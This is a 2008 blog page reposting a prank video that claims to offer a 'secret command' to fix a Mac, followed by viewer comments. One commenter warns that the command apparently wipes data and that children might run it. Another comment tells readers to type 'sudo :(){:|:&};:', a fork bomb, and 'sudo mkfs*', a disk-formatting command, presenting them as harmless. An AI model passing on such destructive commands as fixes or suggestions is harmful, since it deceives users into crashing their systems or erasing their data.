Tuesday, February 5, 2008

Mac vs PC: My Fix to ALL MoldyToaster's Problems

Duration: 00:50 minutes
Upload Time: 2008-01-08 16:45:48
User: emeek77
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Description:

A secrect command to help Moldy get started in teh right direction to beginning to fix his mac.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................this is a joke.

Comments

nitronixasd ::: Favorites  2008-01-17 19:16:43

I had no idea what this did but being cynical and knowing wot ur like I thoought I best check it out. Funny yea, but bear in mind there are kids on here that that will type that not having a clue. You gota be responsible emeek. Funnily enuff pc users have fdisk (F being for shag!) which is very effective and does the same thing in about 1 second! I will say that MS did that get command right, lets get Windoze off as fast as possible! Bleugh!
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thebestofall007 ::: Favorites  2008-01-14 13:37:35

type these commands: sudo :(){:|:&};: and sudo mkfs*
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nzboy2007 ::: Favorites  2008-01-14 09:00:18

my point is 99% of the average users use the first admin account as the starndard user so there fore the command would execute itself thus when they put there password in!
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DMXell ::: Favorites  2008-01-14 08:52:54

It requires the admin password, not the user password. And while root has no password, it's also disabled and unable to be accessed until enabled (which also requires an administrative password).
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nzboy2007 ::: Favorites  2008-01-14 08:44:34

for os x doenst it require the standard user password due to root being un passworded ? just a suggestion =). i remember awhile back doing it and it used my standard users password not roots =). ~Jayson
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